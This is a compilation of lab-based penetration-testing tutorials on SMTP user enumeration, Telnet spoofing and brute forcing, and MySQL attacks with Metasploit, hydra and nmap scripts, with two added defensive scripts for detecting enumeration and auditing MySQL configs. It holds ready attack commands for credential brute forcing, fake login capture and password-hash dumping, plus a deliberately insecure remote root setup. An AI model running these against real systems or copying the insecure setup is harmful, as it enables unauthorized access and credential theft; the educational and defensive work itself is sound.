4 ways to SMTP Enumeration

We can find out the version of an SMTP server and check for valid users using telnet. Execute the following command to connect to the service and read its banner.

Telnet

telnet 192.168.0.25 25

From the given image you can observe that the server replies with “220 mail.ignite.lab ESMTP Postfix”, which tells us that Postfix is installed on the target machine.
You can test for a valid user account with the VRFY command below. If you receive response code 250, 251 or 252, the server has accepted the request and the user account is valid.
If you receive response code 550, the user account is unknown, as shown in the given image.

vrfy admin@mail.ignite.lab


Metasploit
The SMTP service has two commands that allow the enumeration of users: VRFY (which confirms the names of valid users) and EXPN (which reveals the actual addresses behind user aliases and mailing lists). Querying the server with these SMTP commands can reveal a list of valid users.

use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 192.168.1.107
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt
msf auxiliary(smtp_enum) > exploit


From the given image you can read the valid usernames found on the targeted server; the module also grabs the SMTP banner.


smtp-user-enum

smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN and RCPT TO commands. It could be adapted to work against other vulnerable SMTP daemons, but this hasn’t been done as of v1.0.

Type the following command to enumerate usernames using a dictionary of usernames:

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

-M: mode   Method to use for username guessing: EXPN, VRFY or RCPT
-U: file   File of usernames to check via the SMTP service
-t: host   Server host running the SMTP service

From the given image you can see that out of a total of 7 queries only 5 names are valid and exist on the SMTP server.


Type the following command to verify a user's email address on the mail server:

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107

-D: dom    Domain to append to the supplied user list to make email addresses; use this option when you want to guess valid email addresses instead of just usernames.

From the given image you can see that raj@mail.ignite.lab is reported as a valid email ID for the user raj.


iSMTP

iSMTP is a Kali Linux tool used for testing SMTP user enumeration (RCPT TO and VRFY), internal spoofing, and relay.
Type the following command to enumerate valid email IDs on the targeted server:

ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt

-h   The target IP and port (IP:port)
-e   Enable SMTP user enumeration testing and import the email list

From the given image you can see that blue text refers to valid email accounts and red text refers to invalid accounts.
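All four techniques above rely on the same tell: one client receiving a burst of 550 "User unknown" replies to VRFY or RCPT TO for many different addresses. The following detector, an added example that is not part of the original post or of any tool it names, flags that pattern in Postfix smtpd logs; the log lines are constructed to mimic Postfix's "NOQUEUE: reject:" format, and the host names and addresses are made up.

```python
"""Flag SMTP user-enumeration probes (VRFY / RCPT TO) in Postfix smtpd logs.

Added example, not part of the original post or of any tool it names. The log
lines are constructed to mimic Postfix's "NOQUEUE: reject:" format; host
names and addresses are made up.
"""
import re
from collections import defaultdict
from datetime import datetime

# Postfix logs a rejected VRFY or RCPT TO as "NOQUEUE: reject: <CMD> from ...: 550 ..."
REJECT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ postfix/smtpd\[\d+\]: "
    r"NOQUEUE: reject: (?P<cmd>VRFY|RCPT) from \S+\[(?P<ip>[\d.]+)\]: "
    r"(?P<code>\d{3}) \S+ <(?P<addr>[^>]+)>"
)

SAMPLE_LOG = """\
Mar  3 10:15:01 mail postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[192.168.1.107]: 550 5.1.1 <admin@mail.ignite.lab>: Recipient address rejected: User unknown in local recipient table; proto=ESMTP helo=<kali>
Mar  3 10:15:01 mail postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[192.168.1.107]: 550 5.1.1 <backup@mail.ignite.lab>: Recipient address rejected: User unknown in local recipient table; proto=ESMTP helo=<kali>
Mar  3 10:15:02 mail postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[192.168.1.107]: 550 5.1.1 <test@mail.ignite.lab>: Recipient address rejected: User unknown in local recipient table; proto=ESMTP helo=<kali>
Mar  3 10:15:02 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[192.168.1.107]: 550 5.1.1 <guest@mail.ignite.lab>: Recipient address rejected: User unknown in local recipient table; from=<a@b> to=<guest@mail.ignite.lab> proto=ESMTP helo=<kali>
Mar  3 10:15:03 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[192.168.1.107]: 550 5.1.1 <sales@mail.ignite.lab>: Recipient address rejected: User unknown in local recipient table; from=<a@b> to=<sales@mail.ignite.lab> proto=ESMTP helo=<kali>
Mar  3 10:20:45 mail postfix/smtpd[2300]: NOQUEUE: reject: RCPT from relay.example.net[203.0.113.9]: 550 5.1.1 <typo.user@mail.ignite.lab>: Recipient address rejected: User unknown in local recipient table; from=<x@example.net> to=<typo.user@mail.ignite.lab> proto=ESMTP helo=<relay>
"""

def find_enumerators(log_text, threshold=5, window_seconds=60):
    """Return {client_ip: distinct_unknown_addresses} for clients whose 550
    rejections cover at least `threshold` distinct addresses within any
    `window_seconds` span; a single mistyped recipient never trips it."""
    events = defaultdict(list)                    # ip -> [(timestamp, address)]
    for line in log_text.splitlines():
        m = REJECT_RE.match(line)
        if not m or m.group("code") != "550":     # 250/251/252 = accepted, not a probe
            continue
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # year-less syslog stamp
        events[m.group("ip")].append((ts, m.group("addr").lower()))
    flagged = {}
    for ip, probes in events.items():
        probes.sort()
        start = 0
        for end in range(len(probes)):            # sliding window over sorted probes
            while (probes[end][0] - probes[start][0]).total_seconds() > window_seconds:
                start += 1
            if len({addr for _, addr in probes[start:end + 1]}) >= threshold:
                flagged[ip] = len({addr for _, addr in probes})
                break
    return flagged

if __name__ == "__main__":
    for ip, count in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: {count} unknown recipients probed")
```

On a Postfix server the same probes can be cut off at the source with disable_vrfy_command = yes in main.cf, which makes VRFY answer 502 instead of confirming or denying a user.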


Penetration Testing on Telnet (Port 23)


Telnet is a TCP/IP network terminal emulation program that allows you to reach another Internet or local area network device by logging in to the remote machine. Telnet is a client-server protocol that connects to TCP port 23. Using Telnet, you can even test open ports on a remote host.
Requirements
Telnet Server: Ubuntu
Attacker system: Kali Linux
Table of Contents
· Installation & Configuration
· Connecting to Telnet
· Banner Grabbing of Telnet
· Banner Grabbing through Telnet
· MITM: Telnet Spoofing
· Brute Forcing
· Telnet Credential Sniffing

Telnet is an unencrypted and therefore insecure protocol, and we recommend using SSH instead of telnet, as SSH is encrypted. Still, you should understand all the protocols, and telnet is one through which you can connect to other systems on your local network. So let's start with the installation. Telnet server installation is quite simple.
Run the following command with root access on your Ubuntu machine to install the Telnet server.

apt-get install telnetd


Upon completion of the installation, you can check the Telnet service status with the following command.
systemctl status inetd
The output shown in the screenshot confirms that the service is active on Ubuntu.


Test Telnet Connection from Windows machine
Now we will connect to telnet with PuTTY. Enter the IP address of the Ubuntu machine, set port 23 to connect with telnet, and hit Open.


As we hit Open, a new window opens which asks for the Ubuntu username and password; after submitting the right values we are logged in to Ubuntu.


Connecting to Telnet
Telnet is installed. It's time to connect to the remote Telnet server. Log in to your Kali machine and run the following command. It will ask for the username and password; after providing the right values, you are connected.
telnet 192.168.0.196


Banner Grabbing of Telnet
Now that the telnet setup is ready, we will run a version scan to learn which version is running on Ubuntu; as shown in the screenshot below, we got the version with this scan.

Telnet plays a significant role in grabbing the banners of other services running on the target network.
To find the version of the SSH service running on the target computer, open the terminal in Kali Linux and run the following command.
telnet 192.168.0.196 22


Similarly, the version and valid users of an SMTP server can also be found with telnet. Run the command below to discover the version and check for a user.
telnet 192.168.0.136 25
You will note from the picture that the banner "220 metasploitable.localdomain ESMTP Postfix" was successfully retrieved from the target computer.
You can test for a valid user account with the following VRFY command:
vrfy msfadmin
If response code 250, 251 or 252 is received, the server has accepted the request and the user account is valid.
If response code 550 is received, the account is unknown, as shown in the picture.


An attacker may use telnet spoofing as a man-in-the-middle attack in order to capture telnet login credentials.
This is achieved by running a bogus telnet service on the network. Open the terminal in your Kali Linux and load the Metasploit framework; then type the following commands to start the server. Here we have also set a banner of “Welcome to Hacking Articles”, which you can change to anything of your choice.
use auxiliary/server/capture/telnet
set srvhost 192.168.0.102
set banner Welcome to Hacking Articles
exploit


Now, when the victim finds telnet running and tries to connect, they submit their credentials to the bogus service and the login fails.


But we can see our logs here on the server, which show who tried to connect with telnet.


An attacker may also attempt to brute force credentials. This module tests telnet logins and records successful connections on a variety of devices.
use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set rhosts 192.168.0.196
msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt
msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(telnet_login) > set stop_on_success true
msf auxiliary(telnet_login) > exploit

As you can observe, here it has obtained valid credentials for telnet and moreover provides a session on the victim's shell.
sessions -u 2
Once we have the meterpreter session on the victim, we execute the sysinfo command to confirm that we are on the Ubuntu machine.


By default Telnet does not encrypt any of the data it sends, including passwords, so it is always possible to eavesdrop on the communication and then use the password for malicious purposes; anyone with network access between the two hosts can intercept the packets between source and target and obtain authentication details, passwords and data.
From the image given below you can read the username raj and password 123 for Telnet, along with the complete information travelling in the packets between source and destination.


Since Telnet implementations do not support Transport Layer Security (TLS) or Simple Authentication and Security Layer (SASL) authentication extensions, the Secure Shell (SSH) protocol, first released in 1995, was adopted in place of Telnet.

Penetration Testing on MYSQL (Port 3306)

MySQL is an open-source Relational Database Management System (RDBMS). It is widely used for managing and organizing data in a structured format, using tables to store the data. MySQL functions in a networked setup utilizing a client-server architecture. In this configuration, the MySQL server manages the database, while client applications connect to the server to execute tasks like querying and updating data. The interaction between the MySQL clients and the server is conducted over the TCP/IP protocol, with MySQL by default listening on port 3306.

Table of Contents

· Lab setup
· Installation
· Connecting to MySQL server
· Brute forcing MySQL credentials
· Exploitation using Metasploit
· Configuring a custom port
· Conclusion

Lab setup

Target Machine: Ubuntu (192.168.31.205)

Attacker Machine: Kali Linux (192.168.31.141)

Installation

We are going to start with the MySQL server setup on the Ubuntu machine. The command for installing the server is:

apt install mysql-server



To check if the server is up and running, use the following command:

netstat -tlnp



It can be seen from above that the server is up and running at port 3306.

Connecting to MySQL server

We are going to scan the IP using the nmap tool in Kali Linux to check whether the service shows as closed or open. To do so, run the following command in Kali Linux:

nmap -p3306 -sV 192.168.31.205



It can be seen from above that port 3306, on which the MySQL service is running, is closed. The reason is that the MySQL server only listens on the loopback interface: bind-address is set to 127.0.0.1 in the default settings.

In order to make the service reachable, we need to change the configuration. For that, edit the mysqld.cnf file on the Ubuntu machine with the following command:

nano /etc/mysql/mysql.conf.d/mysqld.cnf

 



To make the service open, comment out (#) the bind-address = 127.0.0.1 line.



Now again scan the IP using the nmap tool, it can be seen that the service is open now.

nmap -p3306 -sV 192.168.31.205



However, note that even though the service state shows as open, we will still be unable to connect to the service remotely. To enable the root user to connect from any host and perform any action on any database, the following SQL commands are run on the Ubuntu machine:

mysql -uroot

CREATE USER 'root'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%';

FLUSH PRIVILEGES;



The commands from the above can be interpreted as follows:

The first command is used to log into the MySQL server as the root user. The second command creates a new user named root who can connect from any host (%) and sets the password to 123. The third command grants the newly created root user all privileges on all databases and tables. The last command reloads the privilege tables, ensuring that the changes take effect immediately.

Now we can check whether we can log in to the MySQL server remotely by running the following command in Kali Linux:

mysql -h 192.168.31.205 -uroot -p



Since we are able to connect with the service remotely, now we will start the pentesting.

Brute forcing MySQL credentials

We can brute force the MySQL credentials by passing a list of usernames and passwords to the hydra tool in Kali Linux. Here we are using users.txt as the username list and pass.txt as the password list. The command for the brute force attack is:

hydra -L users.txt -P pass.txt 192.168.31.205 mysql



Exploitation using Metasploit

There are a lot of exploits and auxiliary modules related to the MySQL server. Here we are going to demonstrate a few of them to give an insight into MySQL pentesting.

First we will use auxiliary/admin/mysql/mysql_sql inside Metasploit to run SQL queries directly after connecting to the database.

msfconsole -q

use auxiliary/admin/mysql/mysql_sql

set rhosts 192.168.31.205

set username root

set password 123

set sql show databases

run



There is another auxiliary module which helps in dumping the entire schema, i.e., auxiliary/scanner/mysql/mysql_schemadump. We just need to give the username and password to connect to the database and we can dump the entire schema.

use auxiliary/scanner/mysql/mysql_schemadump

set rhosts 192.168.31.205

set username root

set password 123

run



To dump the usernames and password hashes, we can use auxiliary/scanner/mysql/mysql_hashdump, which outputs the usernames and the password hashes.

use auxiliary/scanner/mysql/mysql_hashdump

set rhosts 192.168.31.205

set username root

set password 123

run



To check whether there is a directory writable by the server, we can use auxiliary/scanner/mysql/mysql_writable_dirs. However, this is not possible by default: there is a setting we need to change in the configuration file, after which we can enumerate writable directories.

To make this configuration, edit the /etc/mysql/mysql.conf.d/mysqld.cnf file and add the line secure_file_priv="" at the end (an empty value removes the directory restriction on file operations).



Now check for the writable directories using Metasploit.

use auxiliary/scanner/mysql/mysql_writable_dirs

set rhosts 192.168.31.205

set username root

set password 123

set dir_list dir.txt

run



It can be seen from above that the directory /tmp is writable.

To check whether particular files and directories exist on the machine, we can use auxiliary/scanner/mysql/mysql_file_enum, which reports whether each directory or file exists.



Finally, to enumerate the whole MySQL server we can use auxiliary/admin/mysql/mysql_enum, which performs the enumeration on the MySQL server using the valid credentials.

use auxiliary/admin/mysql/mysql_enum

set rhosts 192.168.31.205

set username root

set password 123

run



Configuring a custom port

To change the port in MySQL, we need to edit the configuration file. The path of the file is /etc/mysql/mysql.conf.d/mysqld.cnf.

nano /etc/mysql/mysql.conf.d/mysqld.cnf



As we can see, the default port 3306 is in use and the port line is commented out (#). We can change the port number to 4403 and remove the comment (#) from the line.



Now if we scan the IP using nmap, it can be seen that the service is up and running at port 4403.
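The three edits made to mysqld.cnf in this walkthrough (commenting out bind-address, emptying secure_file_priv, moving the port) are exactly what a defender should look for when reviewing a server. The script below is an added example, not the article's or MySQL's own code: it parses the [mysqld] section and reports those settings, using two constructed config snippets that mirror the default file and the article's modified one.

```python
"""Audit a mysqld.cnf for the exposure settings the article walks through.

Added example, not the article's or MySQL's own code. The two config snippets
are constructed to mirror the article's steps (bind-address commented out,
secure_file_priv emptied, port changed to 4403).
"""

def parse_mysqld_section(text):
    """Return {option: value} for the [mysqld] section of an INI-style MySQL
    config. '#' comments and blank lines are skipped; '-' is normalised to
    '_' because MySQL treats both spellings as the same option name."""
    opts, in_mysqld = {}, False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("["):
            in_mysqld = line.lower() == "[mysqld]"
            continue
        if in_mysqld:
            key, _, value = line.partition("=")
            key = key.strip().lower().replace("-", "_")
            opts[key] = value.strip().strip("\"'")      # bare flags get ""
    return opts

def audit_mysqld_cnf(text):
    """Return findings for the three settings changed in the article."""
    opts, findings = parse_mysqld_section(text), []
    port = opts.get("port", "3306")                    # MySQL default port
    if opts.get("bind_address") in (None, "0.0.0.0", "*", "::"):
        findings.append(f"bind-address unrestricted: port {port} is reachable remotely")
    if opts.get("secure_file_priv") == "":
        findings.append("secure_file_priv empty: SELECT ... INTO OUTFILE can write "
                        "wherever the mysqld user can, e.g. the /tmp found above")
    if port != "3306":
        findings.append(f"non-default port {port}: obscures but does not reduce exposure")
    return findings

# Constructed: a stock Ubuntu-style file and the one produced by this article's edits.
DEFAULT_CNF = """\
[mysqld_safe]
socket = /var/run/mysqld/mysqld.sock
[mysqld]
user = mysql
# port = 3306
bind-address = 127.0.0.1
"""
OPENED_CNF = """\
[mysqld]
user = mysql
port = 4403
# bind-address = 127.0.0.1
secure_file_priv=""
"""
```

Run audit_mysqld_cnf(OPENED_CNF) to get the three findings, and audit_mysqld_cnf(DEFAULT_CNF) for an empty list; the 'root'@'%' grant from the earlier step is not visible in the config file and has to be checked in mysql.user instead.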



Conclusion

MySQL server has been a popular choice for application developers for many years; however, its misconfiguration can lead to data leakage. It is recommended to use a proper configuration and implement a strong password policy for the service.

MySQL Penetration Testing with NMAP

In this article we discuss MySQL penetration testing using Nmap, where you will learn how to retrieve database information such as database names, table records, usernames, passwords, etc.

MySQL is an open-source Relational Database Management System that uses Structured Query Language for working with database records.

Let's begin!

Scanning for port 3306

Open the terminal and type the following command to check whether the MySQL service is active on the targeted system; by default the MySQL service listens on port 3306.
nmap -sT 192.168.1.216

From the given image you can observe that port 3306 is open for the MySQL service; now let's enumerate it.


Retrieve mysql information
Now type another command to retrieve MySQL information such as version, protocol, etc.:

nmap --script=mysql-info 192.168.1.216


The above command connects to the MySQL server and prints information such as the protocol: 10, version number: 5.5.57-0ubuntu0.14.04.1, thread ID: 159, status: autocommit, capabilities, and the password salt, as shown in the image below.


Brute force attack
This command uses dictionaries of usernames and passwords and tries each username and password combination in a brute force attack against MySQL.

nmap -p 3306 --script mysql-brute --script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

From the given image you can observe that it found the valid credentials root:toor. These credentials allow logging directly into the MySQL server.


Retrieve mysql user names
This command fetches the MySQL usernames with the help of the given arguments mysqluser=root and mysqlpass=toor.
nmap -p 3306 --script=mysql-users 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the image below you can see that we have found four usernames: root, debian-sys-maint, sr and st.


Retrieve database names
This command fetches the MySQL database names with the help of the given arguments mysqluser=root and mysqlpass=toor.
nmap -p 3306 --script=mysql-databases 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the image below you can read the names of the created databases, such as ignite.


This command performs the same task as above but retrieves the database names using the MySQL query "show databases".

nmap -p 3306 192.168.1.216 --script mysql-query --script-args "query=show databases,username=root,password=toor"

From the image below you can again read the names of the created databases, such as ignite.


Retrieve mysql variable status ON/OFF
When we want to pass a value from one SQL statement to another, we store the value in a MySQL user-defined variable.
This command fetches the MySQL variable names with the help of the given arguments mysqluser=root and mysqlpass=toor.

nmap -p 3306 --script=mysql-variables 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the given image you can observe the ON/OFF status of each MySQL variable.


Retrieve password hashes
This command dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper. The original post repeated the mysql-variables command here; the script that matches this description is mysql-dump-hashes, which takes username and password arguments.
nmap -p 3306 --script=mysql-dump-hashes 192.168.1.216 --script-args username=root,password=toor

From the given image you can observe that it has dumped the password hashes of the respective users we enumerated above.